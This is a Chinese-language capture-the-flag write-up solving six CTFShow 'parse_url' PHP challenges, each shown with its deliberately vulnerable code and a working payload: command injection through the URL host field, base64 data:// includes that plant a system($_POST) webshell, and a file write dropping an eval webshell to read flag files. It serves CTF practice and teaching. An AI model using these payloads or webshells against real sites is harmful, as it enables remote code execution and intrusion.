CTFShow--周末大挑战parse_url篇Writeup-阿里云开发者社区

CTFShow--周末大挑战parse_url篇Writeup

2023-10-30 55

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： CTFShow--周末大挑战parse_url篇Writeup

CTFShow 平台：https://ctf.show/

第一关：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
eval($data['host']);

Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');

也可以通过POST去执行命令获取，得到flag在 flag_is_here.txt下 cat查看一下即可。

?u=http://eval($_POST[a]);
a=system("ls /");

ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}

第二关：

>  <?php
> 
> /*
> # -*- coding: utf-8 -*-
> # @Author: h1xa
> # @Date:   2023-05-10 09:52:06
> # @Last Modified by:   h1xa
> # @Last Modified time: 2023-05-12 13:25:53
> # @email: h1xa@ctfer.com
> # @link: https://ctfer.com
> 
> */
> 
> $data = parse_url($_GET['u']);
> include $data['host'].$data['path'];

Payload：

 get：
 ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b

ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}

第三关：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];

Payload:

get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=
post:A=tac /_f*

ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}

第四关：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
system($data['host']);

Payload：?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*

ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}

第五关：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;

Payload：

get:
?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d
post:
A=tac /_f1a*

ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}

第六关：

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);

Payload:

get:
?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php  
post:
A=system("tac /_f1a*");

ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}

至此本周的周末大挑战全部通过，感谢大家的观看和官网的wp不一样（当时做完了没有及时写现在补完啦，又是充实的一天😊！）